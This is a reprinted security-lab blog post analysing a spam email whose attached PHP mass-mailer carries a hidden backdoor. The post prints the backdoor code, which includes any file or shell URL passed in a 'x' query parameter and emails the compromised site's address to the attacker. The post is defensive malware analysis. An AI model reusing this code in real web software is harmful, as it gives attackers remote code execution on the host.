MX Lab, http://www.mxlab.eu, started to intercept an interesting exploit based on PHP. The email comes in with the subject “Mexico 2011″ and is send from the spoofed address “noreply@prodigy.net.mx” and has the following body:
Attached to the message is a small ZIP file named Mbeta.zip. Once extracted you will have a folder “mailer” two files inside: Mh.php and Tutorial.txt.
This is the content of the tutorial:
TUTORIAL: descomprime el archivo
1* Guardar el archivo Mh.php (Mailer) en su pc.
2* LO suben a su hosting por FTP
3*Una vez subido al hosting entrar desde la web ej www.sudominio.com/Mh.php
4*Este es la version beta con limitaciones, la version full se vende en el pack.
emaileficaz@yahoo.com
Translated:
TUTORIAL: unzip the file
1* Save the file Mh.php (Mailer) on your pc
2* Load up to your FTP hosting
3*Once this is done visit your web site at www.sudominio.com/Mh.php
4*This is the beta version with limitations, the full version is sold in the pack.
emaileficaz@yahoo.com
When you open the PHP on a web server you will have the following webform:
MX Lab has analyzed the PHP code that was present in the document and it appears to be some kind of PHP script to send out a mass mailing but it also contains some additional code to detect certain possibilities to find an exploit on your web server.
if (trim($ _GET['x'])!=”){@include($ _GET['x']);exit();}$ email = ‘hatuey30@hotmail.com’;$ y = ‘http://’ . $ _SERVER['HTTP_HOST'] . $ _SERVER['REQUEST_URI'];@mail($ email, ‘Exploit: ‘. $ _SERVER['PHP_SELF'], ‘Hey , this is a new victim\’s exploit: ‘. $ y .’\n\n You can use (x=shell_url) at the end of the link 
‘, ‘From: ‘. $ email .’ <’. $ email .’>\r\n’);
This particular code will check your web server and sends what it has found by email to an email address, in this case hatuey30@hotmail.com.
We have replaced the address by our own address and have removed the mass mailing feature just to test. The email that we got is:
Hey , this is a new victim’s exploit: http://www.mydomain.com/Mh.php\n\n You can use (x=shell_url) at the end of the link
It is clear that with this PHP technique, your web server is at risk in a certain way. So don’t be fooled by offers that sound too good to be true and in any way do not install any scripts, wether it is PHP, ASP or Coldfusion, on your web server or shared hosting server that are sent by email.
Related Posts
- Email with new password from Facebook Support contains trojan
MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the message that your facebook account has been blocked because of spam that was sent from your accou... - Email with Guys & Dolls ZIP file contains trojan
MX Lab intercepted some emails with the subject “Ad third try” with attached a ZIP file named Guys & Dolls_displayad.zip.
The message comes from a spoofed email address and has the fol... - Email regarding Western Union transaction contains the Oficla trojan
MX Lab intercepted a new trojan variant in emails with the subject “The transfer is available to withdrawl. Western Union.” regarding a money transaction. The email is sent from the spoofe... - Email “Statement of fees 2009/2010″ contains trojan
MX Lab intercepts a new trojan variant in emails with the subject “Statement of fees 2009/2010″. The trojan is known as Trojan.Sasfis (Symantec), Suspicious:W32/Malware!Gemini (F-Secure) o... - Email with subject “Outlook Setup Notification” contains trojan
MX Lab intercepted a few emails with the subject “Outlook Setup Notification”. The message contains instructions to re-configure Microsoft Outlook and to open the attached zip file.
The me... - “Thank you for buying iTunes Gift Certificate!” email contains trojan
MX Lab started to intercept emails with the subject “Thank you for buying iTunes Gift Certificate!” with the trojan Gen:Variant.Bredo.4 (Bitdefender, F-Secure), Win32/Oficla.GQ (NDO32), Tr... - Poisoned Google image searches becoming a problem
If you are a regular user of Google's search engine you might have noticed that poisoned search results have practically become a common occurrence. Google has, of course, noticed this and does its be... - Facebook scammers go back to using Javascript
Facebook scammers know that in order to keep users falling for their scams, they have to use a variety of approaches. For example, there was a time where rogue applications were the scammers' preferre... - Firefox 4 gets its first security update
Yesterday, five weeks after shipping Firefox 4, the Mozilla project published the new browser's first-ever security update. The Firefox version number bumps up to 4.0.1.The update fixes 50-odd bugs in... - The New York Yankees and DSLReports.com responsible for 30,000 more data loss victims
This message may repeat. This message may repeat. For those of us old enough to have fond memories of the phonograph, the phrase "broken record" may come to mind.Yes, more user information has been le...
Posted on 03 March 2011. Tags: ‘Base, 2011′, contains, datos, Email, Exploit, Mexico, offer
The above information is reprinted from and copyrighted © by MX Lab.
